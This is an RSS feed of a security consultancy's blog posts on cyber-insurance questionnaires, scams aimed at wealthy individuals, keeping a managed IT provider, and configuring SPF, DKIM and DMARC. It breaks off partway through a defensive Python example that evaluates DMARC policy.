<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Cybersecurity Audits Archives - Foster Institute</title>
	<atom:link href="https://fosterinstitute.com/category/cybersecurity-audits/feed/" rel="self" type="application/rss+xml" />
	<link>https://fosterinstitute.com/category/cybersecurity-audits/</link>
	<description>Cybersecurity Experts</description>
	<lastBuildDate>Fri, 19 Jul 2024 03:37:19 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>

<image>
	<url>https://fosterinstitute.com/wp-content/uploads/2021/02/Favicon.png</url>
	<title>Cybersecurity Audits Archives - Foster Institute</title>
	<link>https://fosterinstitute.com/category/cybersecurity-audits/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Demystifying Questions Cyber Insurance Companies Will Ask You</title>
		<link>https://fosterinstitute.com/questions-cyber-insurance-companies-will-ask-you/</link>
		
		<dc:creator><![CDATA[Mike Foster]]></dc:creator>
		<pubDate>Mon, 08 Jul 2024 22:00:22 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Cybersecurity Audits]]></category>
		<category><![CDATA[Password Security]]></category>
		<category><![CDATA[Supporting IT Professionals]]></category>
		<category><![CDATA[Wireless Security]]></category>
		<guid isPermaLink="false">https://fosterinstitute.com/?p=5302</guid>

					<description><![CDATA[<p>If you have existing or are applying for new Cyber Insurance coverage, be prepared for the questionnaire. Knowing what they’ll ask can give you time to implement systems to answer “yes” to the questions affecting your premium rates and whether you’re still considered insurable. Common questions on insurance applications include: Do you use MFA? Multi-factor authentication [&#8230;]</p>
<p>The post <a href="https://fosterinstitute.com/questions-cyber-insurance-companies-will-ask-you/">Demystifying Questions Cyber Insurance Companies Will Ask You</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>If you have existing or are applying for new Cyber Insurance coverage, be prepared for the questionnaire. Knowing what they’ll ask can give you time to implement systems to answer “yes” to the questions affecting your premium rates and whether you’re still considered insurable.</p>
<p><strong>Common questions on insurance applications include:</strong></p>
<p><strong>Do you use MFA?</strong> Multi-factor authentication means users must complete a second step when logging in. A prevalent method for the second factor is an authentication application on users’ phones. It is essential to require number matching, so that the user must match a number displayed during sign-in rather than simply approving a prompt. Another second factor is a time-based one-time password (TOTP) app, which displays a number on the phone that the user enters as part of the authentication process; the number resets periodically, typically every 30 seconds. Other factors include hardware keys that plug into USB ports and biometrics such as fingerprints or facial recognition. A common second factor is receiving an SMS text message with a code, but that method is vulnerable to attacks such as SIM swapping. In the interest of security, you should enforce MFA everywhere possible, including VPN, Remote Desktop, and SaaS offerings.</p>
<p><strong>Do you provide ongoing cybersecurity awareness training and periodic phishing simulation emails to measure worker proficiency?</strong> Your users must receive regular security awareness training, such as once per month and perhaps a comprehensive webinar or other presentation once a year. Additionally, services can send users a simulated phishing email once a month to measure their response, such as whether they open the message, click on the simulated fraudulent link, and are duped into entering credentials. One often overlooked aspect of training and simulated phishing is that it takes time for your already overworked staff to configure, send, monitor, and produce reports about the results every month. You’re welcome to contact us to provide that service; we do 100% of the work, so there is no additional burden on your workers. Training for new employees is available. We also provide comprehensive yearly training webinars and other presentations. Whatever training you use, be sure that it adapts to keep your users current with the rapidly evolving threat landscape.</p>
<p><strong>Do you provide password management tools to users?</strong> Tools that remember and automatically enter users’ passwords can help encourage users to use different passwords for every login. Users with the habit of reusing passwords pose a risk to your organization. Once attackers compromise a password, they will attempt to use that same password at popular sites. This practice is sometimes called credential stuffing, and attackers can be very successful at breaking into sites if users reuse passwords. An added benefit is user productivity and user happiness. Ensure the company&#8217;s password manager uses strong encryption to store your passwords securely. Single Sign-On (SSO) is becoming more popular, allowing users to log in once to access multiple sites or resources.</p>
<p><strong>Do you utilize geo-blocking or geo-filtering?</strong> These technologies identify computers, users, and email messages based on geographical locations. You will be more secure if you block email and login attempts from geographical areas where you never do business and block user logins from countries without users. While attackers can bypass these protections using VPNs, the protections are still helpful.</p>
<p><strong>Are users local administrators?</strong> When you set up a new Windows or Apple computer, the first user has local administrator access and can perform many activities, including installing programs. If an attacker manages to compromise that user’s account, the attacker has tremendous power to compromise that computer and potentially your entire organization. This topic is complex, but the goal of every organization must be to ensure all workers are “standard users” on their computers. Being a standard user limits what an attacker can damage and makes the user account more difficult to compromise in the first place. Privileged Access Management (PAM) solutions help manage local admin rights by controlling and monitoring privileged access to critical systems.</p>
<p><strong>Do you segment your network?</strong> Network segmentation splits your network into smaller parts based on the purpose or type of device. For example, suppose you isolate your security cameras from your servers on a different network segment, such as a subnet or VLAN. If an attacker breaks into a security camera, segmentation can block their ability to hack your servers through the camera. Common segments include:</p>
<p>-Servers<br />
-Desktops and Laptops<br />
-Wireless Network<br />
-VPN users<br />
-Security cameras<br />
-VoIP systems<br />
-Different floors in your building or different buildings on your campus</p>
<p>It is possible to over-segment and create too much work for your IT Team, but that rarely happens. Your team will set up Access Control List (ACL) rules that limit communications between the segments to block unauthorized activities.</p>
<p><strong>Have you established a security baseline for your systems?</strong> Have a documented standard configuration for security controls you enforce on your servers, workstations, and mobile devices.</p>
<p><strong>How soon after release do you apply critical security updates to your devices?</strong> Microsoft, Apple, your firewall manufacturer, and other providers release security updates to programs to block attackers from using previously undetected security holes. You must apply the patches quickly to prevent attackers from exploiting the vulnerabilities. Testing patches before deployment is essential to avoid errors. Staging patches allows you to help ensure they don&#8217;t disrupt your production network. Zero-day patches and updates fix problems that attackers are already using to compromise systems.</p>
<p><strong>Do you allow workers to use family computers or mobile devices to access email and work from home?</strong> Family computers are significantly less secure than company-issued devices that your IT Team manages, monitors and protects 24×7. It is relatively common for organizations to permit users to use their BYOD phones to access company email. Your insurance company could see that as a red flag against providing or renewing a policy. You’ll want to demonstrate other safeguards you use to minimize the risk.</p>
<p><strong>Do you enforce EPP on all devices?</strong> An Endpoint Protection Platform (EPP) is a tool your IT Team can use to protect each device on your network. Ask your IT Team; chances are they’ve implemented this solution. They might also use Security Information and Event Management (SIEM) to enhance visibility and response. SIEM systems aggregate and analyze activity from different resources across your IT infrastructure.</p>
<p><strong>Do you utilize EDR/XDR tools?</strong> Using Endpoint Detection and Response (EDR), Extended Detection and Response (XDR), or Managed Detection and Response (MDR) agents on laptops and other endpoints can increase security by monitoring for malicious behavior and for indicators of compromise (IoCs). EDR/XDR tools provide many benefits, including continuously monitoring devices and watching for suspicious activities or evidence that an attacker is compromising a system. EDR/XDR is designed to identify, isolate, and mitigate threats. EDR and XDR must be effectively monitored, managed, and updated. One way many organizations ease the burden on their internal IT Teams is to utilize a third-party MSSP to perform these tasks. Managed Detection and Response (MDR) means you pay a third-party provider to manage your EDR/XDR. One key point to remember is that attackers can also obtain these protection tools and continually seek ways to bypass them. We perform Red Team Exercises at companies to test the capabilities of the EDR and XDR protections. Do not make the common mistake of letting your guard down in other security areas after implementing EDR or XDR.</p>
<p><strong>How frequently do you conduct internal and external security audits, vulnerability assessments, penetration tests, and Red Team Exercises?</strong> These tests identify previously undiscovered weaknesses in your security. Please get in touch with us if you need these services as part of a comprehensive security advisory service for executives to help them secure their organizations. We guide and become a resource for your existing IT team rather than replacing them.</p>
<p><strong>Does your spam filter scan messages and attachments for malicious links?</strong> If the answer is no, you need to add these features immediately.</p>
<p><strong>Do you use web filtering and DNS filtering?</strong> Web filtering features, often integrated with firewalls, allow your IT team to block known malicious sites, gambling, and other categories of websites. The Domain Name System (DNS) maps website hostnames to the IP addresses of servers on the web. DNS filtering services strive to identify malicious web servers and automatically block communications from your network to them. As a bonus, some services permit you to hinder users from accessing sites you might deem inappropriate.</p>
<p><strong>Do you use SPF for email messages?</strong> The Sender Policy Framework is a protective solution that your IT Team can enable to permit your email servers to confirm that inbound email messages came from an approved server rather than a fraudster impersonating or spoofing a legitimate source. While they are at it, your IT Team can enable DKIM to help other organizations’ mail servers confirm that messages they receive from you are legitimate and unaltered. They can configure DMARC to tell remote email servers to throw away messages from fraudsters attempting to impersonate your organization. It is essential to regularly review your SPF, DKIM, and DMARC records to adapt to the changing configurations and threat landscape.</p>
<p><strong>Do you identify storage locations and isolate PII, PHI, and other sensitive data?</strong> Determining where you store Personally Identifiable Information (PII), Protected Health Information (PHI), Cardholder Data (CHD), and other sensitive information is essential. Knowing where sensitive information is stored is a fundamental step in protecting it. Do you keep the information isolated and protected? This identification and isolation is becoming even more critical due to the integration of AI into organizations, which might give AI access to company information.</p>
<p><strong>Do you use role-based access control (RBAC) to limit user access based on their job functions, and how do you manage and monitor privileged accounts? </strong>Role-Based Access Control (RBAC) ensures that users only have access to the data and systems necessary for their specific job functions. This minimizes the risk of unauthorized access to sensitive information. Privileged accounts with higher access levels are managed through Privileged Access Management (PAM) solutions that monitor and control their use, reducing the risk of misuse or compromise. Regular audits and real-time monitoring of these accounts are essential to detect and respond to suspicious activities.</p>
<p><strong>Do you encrypt sensitive data at rest and in transit, and what encryption standards do you use? </strong>Encryption is critical for protecting sensitive data when it is stored (at rest) and transmitted (in transit). Encryption standards such as Advanced Encryption Standard (AES) with 256-bit keys are commonly used to ensure robust security. Data at rest is encrypted to protect it from unauthorized access, even if physical security is breached. Data in transit is encrypted using protocols like TLS (Transport Layer Security) to prevent interception during transmission over networks.</p>
<p><strong>How do you assess and manage third-party vendors&#8217; cybersecurity risks and ensure vendors follow appropriate security practices? </strong>Third-party vendors can introduce significant cybersecurity risks. Assessing these risks involves regular security evaluations and audits of the vendors&#8217; practices. It’s important to have contracts that require vendors to follow appropriate security practices tailored to their roles and services. Continuous monitoring and periodic reassessments ensure that vendors maintain the required security posture over time. Organizations can manage risks by working collaboratively with vendors to meet security expectations without imposing stringent certification requirements.</p>
<p><strong>Do you use firewalls, intrusion detection/prevention systems (IDS/IPS), and other network security measures? </strong>Firewalls act as a barrier between the internal network and external threats, controlling incoming and outgoing traffic based on predetermined security rules. Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) monitor network traffic for suspicious activities and take action to prevent potential breaches. These network security measures are crucial for protecting against unauthorized access and cyberattacks.</p>
<p><strong>How do you secure remote access to your network? </strong>Securing remote access involves implementing measures such as Virtual Private Networks (VPNs), which encrypt the connection between remote users and the corporate network. Your IT professionals must manage remote devices to help increase security. Multi-factor authentication (MFA) adds an extra layer of security by requiring additional verification steps beyond just a password. Additionally, restricting remote access to only essential personnel and monitoring for unusual login activities are critical components of a secure remote access strategy. This is an extensive topic; please let us know if you want more information.</p>
<p><strong>What physical security measures do you have in place to protect your data centers and offices? </strong>Physical security measures are essential to protect data centers and office premises from unauthorized access. These measures include access control systems like key cards or biometric scanners, surveillance cameras, and security personnel. Secure facilities should also have environmental controls such as fire suppression systems and backup power supplies to safeguard against physical threats and disasters. The Foster Institute offers full-scale Physical Red Team Exercises to test your physical security measures.</p>
<p><strong>Are you compliant with relevant regulations and industry standards, such as GDPR, HIPAA, PCI-DSS, or ISO/IEC 27001, and how do you ensure ongoing compliance with these standards? </strong>Compliance with regulations and industry standards demonstrates a commitment to maintaining high security and privacy standards. Regular audits and assessments help ensure compliance with frameworks such as GDPR (General Data Protection Regulation), HIPAA (Health Insurance Portability and Accountability Act), PCI-DSS (Payment Card Industry Data Security Standard), and ISO/IEC 27001. Ongoing compliance is maintained through continuous monitoring, employee training, and updates to policies and procedures as standards evolve. Please let us know if you need help with achieving or maintaining compliance. The Foster Institute, Inc. can simplify and manage the process for you.</p>
<p><strong>How do you secure mobile devices employees use to access company data and use mobile device management (MDM) solutions to enforce security policies on mobile devices? </strong>Mobile Device Management (MDM) solutions enforce security policies on employees&#8217; mobile devices that access company data. These solutions can remotely manage and secure devices, ensuring they comply with organizational security standards. Features include enforcing strong passwords, encrypting data stored on the device, and remotely wiping data if a device is lost or stolen. This ensures that mobile devices do not become a weak point in the company&#8217;s overall security posture.</p>
<p><strong>Do you store backups offline or on immutable storage?</strong> If an attacker gains access with the intent of encrypting or deleting data to demand ransom, they might attempt to destroy your ability to restore. They know you’re more likely to pay the ransom if you cannot restore sensitive data. So, you must isolate some backup data so the attacker cannot damage it. It is essential to have backups that threat actors cannot delete or damage if they break into your network. Immutable storage is data stored where you can access it, but no users, not even your administrators, can delete or alter the backup files. Cloud providers, such as Microsoft, offer immutable cloud storage. Other devices use write-once-read-many (WORM) technology to store data immutably. Offline backup is disconnected from your network. Some companies might use backup tapes or hard drives disconnected from the network and store them in a safe location for offline storage. Other organizations have a secondary network, isolated from the primary network, dedicated to their backup servers; the only connection is a server that transfers production network data to the backup network. It is best to store backups in diverse locations for redundancy and eliminate any single points of failure.</p>
<p><strong>Do you encrypt your backups?</strong> If an unauthorized person accesses your backup data, it is useless if they cannot read the contents. Encryption is a setting in your backup software. There was a time when people wouldn’t encrypt backups because the backups would take much longer. With today’s technology, there should be little added time.</p>
<p><strong>How often do you practice the restore process?</strong> If you have never practiced your complete restore process, do it now. Many organizations find out they cannot restore from their backups. Often, their failed attempt was the first time they’d ever tried to restore. It can be complicated to perform a test restore, so be prepared to give your IT Team additional time. If you outsource your IT, it is understandable that they’ll charge you for practicing the restore. Always perform restore tests in a controlled environment, separate from your production systems.</p>
<p><strong>How long will it take to restore your data from backups?</strong> When you practice your complete restore process, measure the time it takes to restore. If you find out the duration is too long, you can take steps to speed up the process.</p>
<p><strong>What steps do you take to prevent ransomware attacks?</strong> This space on the insurance application allows you to list the items above in statement form. Almost all security measures you use can protect against ransomware attacks or limit the impact.</p>
<p><strong>Do you have a documented Disaster Recovery Plan (DRP) and Business Continuity Plan (BCP) in place?</strong> Documented disaster recovery plans demonstrate that you’ve thought through the processes required to recover from disruptive events. These plans should outline specific procedures for data recovery, system restoration, and maintaining business operations during and after an incident.</p>
<p><strong>Do you conduct disaster recovery drills?</strong> Regular drills ensure your team is prepared to execute the DRP and BCP effectively. These drills can be as basic as tabletop exercises, where team members discuss their roles and responses to hypothetical scenarios, or as comprehensive as full-scale exercises that simulate actual disaster conditions and involve all aspects of the organization.</p>
<p>These are some of the most common questions on our customers’ insurance policy application and renewal forms. If you find others, please reach out for guidance.</p>
<p>The post <a href="https://fosterinstitute.com/questions-cyber-insurance-companies-will-ask-you/">Demystifying Questions Cyber Insurance Companies Will Ask You</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Attackers are Targeting High Net Worth Individuals</title>
		<link>https://fosterinstitute.com/attackers-are-targeting-high-net-worth-individuals/</link>
		
		<dc:creator><![CDATA[Mike Foster]]></dc:creator>
		<pubDate>Thu, 08 Sep 2022 12:00:25 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Cybersecurity Audits]]></category>
		<category><![CDATA[Family Security]]></category>
		<category><![CDATA[Mobile Security]]></category>
		<category><![CDATA[Password Security]]></category>
		<category><![CDATA[Wireless Security]]></category>
		<guid isPermaLink="false">https://fosterinstitute.com/blog/?p=2693</guid>

					<description><![CDATA[<p>An experienced high-level executive shared his concern about how attackers invest more time targeting high-net-worth individuals. If you fall into that category, especially now, you must be extra vigilant to protect yourself, your family, and your organization. The exploits may come in the form of attempts to get you to transfer money to a friend, [&#8230;]</p>
<p>The post <a href="https://fosterinstitute.com/attackers-are-targeting-high-net-worth-individuals/">Attackers are Targeting High Net Worth Individuals</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>An experienced high-level executive shared his concern about how attackers invest more time targeting high-net-worth individuals. If you fall into that category, especially now, you must be extra vigilant to protect yourself, your family, and your organization.</p>
<p>The exploits may come in the form of attempts to get you to transfer money to a friend, someone threatening to send out defamatory information about you unless you pay them not to, or phony messages attempting to acquire some personally identifiable information from you.</p>
<p>Be sure to alert your family members that it could be a forgery, even if an email message appears to be from you. Family members should verbally speak to you if there is ever a concern about any communications that are purportedly from you. No one should ever respond to a suspicious email or text message.</p>
<p>Know that legitimate text messages claiming to be from organizations usually come from a five- or six-digit short code such as 26096. If the text message is from a phone number they don&#8217;t recognize, even if the digits are all run together, like 4105550009, there is a good chance the text is fraudulent.</p>
<p>Additionally, there are crucial steps you must take to help protect your devices, including iPhones, iPads, Android phones and tablets, laptops, desktop computers, and all of your other devices. Keep the devices locked up when they are not in your possession. If someone gains physical access to your device, they may be able to steal information, both your stored history and your activity in real time, now and into the future.</p>
<p>Be sure to apply critical security updates to the operating systems and browsers when prompted. But watch out for fake requests. Update alerts should never come via email or text message; those are bogus and dangerous.</p>
<p>Avoid connecting to public WiFi networks in coffee shops, airports, and hotels. Using your phone as a hotspot is much safer. A VPN protects your privacy but doesn&#8217;t prevent attackers from targeting your device on the network.</p>
<p>Avoid using a family computer to do your online banking, connect to your office, or type sensitive information. Attackers seek to infect work-from-home computers, and family computers are often the most vulnerable. Use your laptop or computer dedicated to you so that another family member doesn&#8217;t accidentally install malware for attackers to monitor your keystrokes, take control, or dwell inside, waiting for you to log in to your office.</p>
<p>There are so many steps to take, and, above all, you must have a heightened awareness that you are at an increased risk of attacks as a high-net-worth individual. Consider having a cybersecurity advisor to guide you and your team as you increase your security. Be sure they hold top-level cybersecurity certifications, including CISSP, CEH, and CISA, to help you receive the best guidance.</p>
<p>Please forward this to your friends so that they are extra vigilant too.</p>
<p>The post <a href="https://fosterinstitute.com/attackers-are-targeting-high-net-worth-individuals/">Attackers are Targeting High Net Worth Individuals</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Reasons to Keep Your Same Outsourced Computer Consultant or Managed Service Provider</title>
		<link>https://fosterinstitute.com/reasons-to-keep-your-same-outsourced-computer-consultant-or-managed-service-provider/</link>
		
		<dc:creator><![CDATA[Mike Foster]]></dc:creator>
		<pubDate>Thu, 01 Sep 2022 22:57:37 +0000</pubDate>
				<category><![CDATA[Cloud Security]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Cybersecurity Audits]]></category>
		<category><![CDATA[Ransomware]]></category>
		<category><![CDATA[Supporting IT Professionals]]></category>
		<guid isPermaLink="false">https://fosterinstitute.com/?p=5319</guid>

					<description><![CDATA[<p>Our role is to be security advisors to organizations, some of whom outsource their IT services. Executives sometimes express their frustration and ask us whether to fire a Managed Service Provider or third-party IT consulting company that handles all aspects of their IT needs. We always listen to the executive and ask them about specific [&#8230;]</p>
<p>The post <a href="https://fosterinstitute.com/reasons-to-keep-your-same-outsourced-computer-consultant-or-managed-service-provider/">Reasons to Keep Your Same Outsourced Computer Consultant or Managed Service Provider</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Our role is to be security advisors to organizations, some of whom outsource their IT services. Executives sometimes express their frustration and ask us whether to fire a Managed Service Provider or third-party IT consulting company that handles all aspects of their IT needs. We always listen to the executive and ask them about specific experiences. 99% of the time, organizations are better off sticking with their existing provider, and here are some reasons.</p>
<p>An exception will be if you feel held hostage by them, or if there is some other outstanding reason they’ve failed you. Yes, we&#8217;ve seen horror stories. In those extreme cases, the executives had already decided to fire their outsourced firm.</p>
<p>When we perform cybersecurity consulting, unless the executives ask us to approach it differently, we give the outsourced firm the benefit of the doubt that their intentions are always to provide you with the best service possible. If we encounter a grave security mistake, that&#8217;s one purpose of the audit – for us to catch things like that so your IT providers can fix it. We almost always find at least one gaping hole, which is our specialty. After all, third-party IT companies are responsible for many aspects of your IT operations, while our focus is cybersecurity. Once outsourced IT firms realize we&#8217;re there to help and not replace them or their services, they relax, welcome input, and ask questions about the best way to protect you.</p>
<p>If you move to a new provider, there could be a steep learning curve before they can serve you at the same level. Keep in mind that your IT provider is already familiar with your systems and understands the unique challenges you face. Unless their turnover is high, the professionals that serve you know your team members and maintain a friendly, professional working relationship with them.</p>
<p>If you consider changing providers because some well-meaning person says you have the wrong brands of products, find out if their personal bias is evidence-based. If the specific solution your provider prefers meets all the functionality criteria, it is almost always best to allow your IT Professionals to select brands and vendors they like. They typically prefer particular brands and solutions for important reasons.</p>
<p>For example, their engineers might be most familiar with Cisco, Juniper, SonicWALL, WatchGuard, or one of the many other firewall brands. Most brands, if configured properly, will serve you well. As with automobile repairs, you want a technician familiar with your car&#8217;s brand. If you ask your outsourced IT company to support an unfamiliar product, you&#8217;re putting them in an uncomfortable position. They want to consistently produce excellent outcomes for you, and if you insist that they support a brand they are unfamiliar with, you could be setting them up for failure.</p>
<p>Your outsourced IT firm almost certainly has you set up with specific vendors for your anti-virus, anti-spam, backup solution, etc., because they have automated tools that allow them to monitor and manage your solutions. That efficiency of scale facilitates them taking optimum care of you. Deviating from their standard brands creates unnecessary expense and frustration. For this reason, if you do decide to change providers, prepare yourself for needing to replace some of your software and hardware to conform to the new IT provider&#8217;s preferred configuration.</p>
<p>If your provider is too slow to respond, perhaps they&#8217;re understaffed but have an expedited service option you could invest in to get priority access to their best engineers. Or maybe they have a different brand or product solution that permits them to use streamlined tools, but you&#8217;re still using products a previous IT firm installed.</p>
<p>Without knowing the brands you are using, I cannot say if you&#8217;ve got great ones. I can share that most brands have excellent products and solutions that work well when appropriately configured by knowledgeable professionals who&#8217;ve proven their proficiency by earning certifications on those brands.</p>
<p>Executives sometimes ask if they should seek a cheaper provider. We rarely see third-party IT companies overcharging for services. They are aware of the competitive nature of their business. Consider how much it would cost you if all your systems were down, and the investment you pay your IT support firm is probably worth it.</p>
<p>Yes, your IT provider might be priced higher, but consider their level of professionalism too. Are they quick to reply when you need them? Do they fix issues the first time?</p>
<p>It can be an excellent sign if you feel you don&#8217;t need your provider because you never have any problems. That can indicate that your IT firm is taking such good care of the inner workings of your systems that everything runs smoothly for you. If you did terminate your IT provider, things could start falling apart slowly, without being observable, until everything stacks up to the point when you suffer a disaster.</p>
<p>If you wonder whether they are competent, consider asking them for a list of certifications they have earned from Microsoft, Cisco, or the other brands and technologies they provide and support for you. If they are not certified, encourage them to take the training and pass the tests. Certifications often involve significant expense and time, so don&#8217;t expect them to earn the credentials overnight. Passing the exam will be a breeze if they are already knowledgeable about the products they support, and during the training they might find new ways to help your organization without you needing to buy more stuff. Everyone benefits.</p>
<p>Your firm may not have top-level cybersecurity certifications. Cybersecurity is a complicated and rapidly evolving field that requires intense specialization. We never have expectations that third-party computer services companies know everything there is to know about cybersecurity. We expect them to be open to cybersecurity recommendations. We&#8217;re thrilled to discuss and answer their questions as they tune the solutions from brands they sell and support.</p>
<p>As cybersecurity advisors, it is rewarding to see and facilitate, if necessary, our customers strengthening their relationship with their MSPs and other third-party IT firms. Sometimes it is a matter of us helping you identify the pros and cons of the add-on cybersecurity packages your provider offers. Or, if their package isn&#8217;t the perfect fit, sometimes you can negotiate the offerings to get the best solution.</p>
<p>Please forward this to your friends if they wonder if they should change to a new outsourced IT consulting firm. As long as they&#8217;re well-staffed, competent, and professional, there are many advantages to staying with the company with whom they have an established working relationship.</p>
<p>The post <a href="https://fosterinstitute.com/reasons-to-keep-your-same-outsourced-computer-consultant-or-managed-service-provider/">Reasons to Keep Your Same Outsourced Computer Consultant or Managed Service Provider</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Block Inbound and Outbound Fraudulent Email Messages</title>
		<link>https://fosterinstitute.com/block-inbound-and-outbound-fraudulent-email-messages/</link>
		
		<dc:creator><![CDATA[Mike Foster]]></dc:creator>
		<pubDate>Fri, 04 Feb 2022 15:33:57 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Cybersecurity Audits]]></category>
		<category><![CDATA[Email Security]]></category>
		<category><![CDATA[Hacking]]></category>
		<guid isPermaLink="false">https://fosterinstitute.com/?p=5128</guid>

					<description><![CDATA[<p>This week, two companies contacted us asking how they can block bad actors from sending fraudulent email messages pretending to be from their company. There are underutilized email settings that can:-Prevent bad actors from sending email messages impersonating your organization&#8217;s email address-Prevent your workers from receiving emails from bad actors impersonating a legitimate sender Please [&#8230;]</p>
<p>The post <a href="https://fosterinstitute.com/block-inbound-and-outbound-fraudulent-email-messages/">Block Inbound and Outbound Fraudulent Email Messages</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>This week, two companies contacted us asking how they can block bad actors from sending fraudulent email messages pretending to be from their company.</p>



<p>There are underutilized email settings that can:</p>

<ul class="wp-block-list"><li>Prevent bad actors from sending email messages impersonating your organization&#8217;s email address</li><li>Prevent your workers from receiving emails from bad actors impersonating a legitimate sender</li></ul>



<p>Please forward this message to your IT professionals and ask if someone configured your organization&#8217;s email to support SPF, DKIM, and DMARC. Your IT team can contact your email provider for assistance.</p>



<p>SPF: A DNS record that lists the servers allowed to send mail for your domain. A receiving server checks the connecting server&#8217;s IP address against that list, so a message injected from a fraudulent server fails the check.</p>



<p>DKIM: Your outgoing server adds a digital signature to each message, and the matching public key is published in your DNS. A receiving server verifies the signature to confirm the message came from you and that nobody changed the signed parts since you sent it. (The signature does not encrypt the message; it only proves origin and integrity.)</p>



<p>DMARC: A DNS record that tells receiving servers what to do with a message that fails both checks, meaning neither SPF nor DKIM passes for a domain that matches the From: address the recipient sees: deliver it anyway (p=none, monitoring only), send it to the spam folder (p=quarantine), or refuse it (p=reject). DMARC also lets you name a reporting address, so receiving servers send you reports showing who is sending mail with your domain name, legitimate or not. Start at p=none to discover the legitimate senders you forgot about, then move to quarantine and finally reject.</p>



<p>Note: SPF, DKIM, and DMARC protect the part of your email address after the at sign: yourcompanydomain.com. They do nothing about lookalike domains. If someone receives an email message from your name at stumbling ballet dot com, they need to notice that&#8217;s not you, and bad actors often register a legitimate-looking domain with a minor difference, such as one letter changed in the name. Nor do these records stop an attacker from putting your name in the display name of a message sent from an unrelated address. Awareness training and mail-filter rules for lookalike domains cover that gap.</p>



<p>Both sides have a part to play: the sending organization publishes its SPF, DKIM, and DMARC records in DNS, and the receiving server has to check them (the major mail providers do). So, please forward this message to encourage all the other organizations you know to publish their records; that is what protects your workers when bad actors impersonate those organizations.</p>



<p>Some organizations use free tools to make the process of creating the DNS records much easier. Example sites they use include <a href="https://easydmarc.com/tools/dkim-record-generator">https://easydmarc.com/tools/dkim-record-generator</a>, <a href="https://www.dmarcanalyzer.com/spf/spf-record-generator/">https://www.dmarcanalyzer.com/spf/spf-record-generator/</a>, and <a href="https://dmarcian.com/dmarc-record-wizard/">https://dmarcian.com/dmarc-record-wizard/</a> There are many other sites too. Some use mxtoolbox.com to check all three records.</p>
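<p>As an added example, not code from the original post or from any of the tools above, here is a short Python script showing how a receiving server combines the SPF and DKIM results with your DMARC record, plus the checks we look for when auditing a DMARC record. The domain names and records in it are constructed placeholders, nothing is looked up in DNS, and the organizational-domain logic uses the simplified "last two labels" rule (real implementations use the Public Suffix List so that domains such as example.co.uk are handled correctly).</p>

```python
# Added example (not code from the original post): how a receiving mail
# server combines SPF and DKIM results with the sender domain's DMARC
# record, plus the audit checks we look for in a DMARC record.
# Assumptions: domain names and records below are constructed placeholders,
# nothing is looked up in DNS, and the organizational-domain logic is the
# simplified "last two labels" rule (a real implementation uses the Public
# Suffix List so that e.g. example.co.uk is handled correctly).


def parse_dmarc(record: str) -> dict:
    """Parse a DMARC TXT record such as "v=DMARC1; p=reject; rua=mailto:..."
    into a tag dictionary, filling in the RFC 7489 defaults for the tags
    that control alignment (relaxed) and sampling (100 percent)."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v", "").upper() != "DMARC1" or tags.get("p") not in ("none", "quarantine", "reject"):
        raise ValueError("not a valid DMARC record: " + record)
    tags.setdefault("adkim", "r")
    tags.setdefault("aspf", "r")
    tags.setdefault("pct", "100")
    return tags


def org_domain(domain: str) -> str:
    """Simplified organizational domain: the last two DNS labels."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(identifier: str, from_domain: str, mode: str) -> bool:
    """Relaxed ("r") alignment accepts any subdomain of the same
    organizational domain; strict ("s") requires an exact match."""
    identifier, from_domain = identifier.lower(), from_domain.lower()
    if mode == "s":
        return identifier == from_domain
    return org_domain(identifier) == org_domain(from_domain)


def dmarc_disposition(record, from_domain, spf_result, spf_domain, dkim_result, dkim_domain):
    """Return "pass" if SPF or DKIM passed *and* is aligned with the visible
    From: domain; otherwise return the policy the receiver should apply
    ("none", "quarantine" or "reject"). spf_domain is the envelope sender
    (MAIL FROM) domain; dkim_domain is the d= tag of the DKIM signature."""
    tags = parse_dmarc(record)
    spf_ok = spf_result == "pass" and aligned(spf_domain, from_domain, tags["aspf"])
    dkim_ok = dkim_result == "pass" and aligned(dkim_domain, from_domain, tags["adkim"])
    return "pass" if (spf_ok or dkim_ok) else tags["p"]


def weak_policy_findings(record: str) -> list:
    """Audit checks: settings that leave the domain spoofable or unmonitored."""
    tags = parse_dmarc(record)
    findings = []
    if tags["p"] == "none":
        findings.append("p=none only monitors; spoofed mail is still delivered")
    if tags["pct"] != "100":
        findings.append("pct=%s applies the policy to only part of the failing mail" % tags["pct"])
    if "rua" not in tags:
        findings.append("no rua= address, so you receive no aggregate reports")
    return findings


if __name__ == "__main__":
    RECORD = "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"  # constructed
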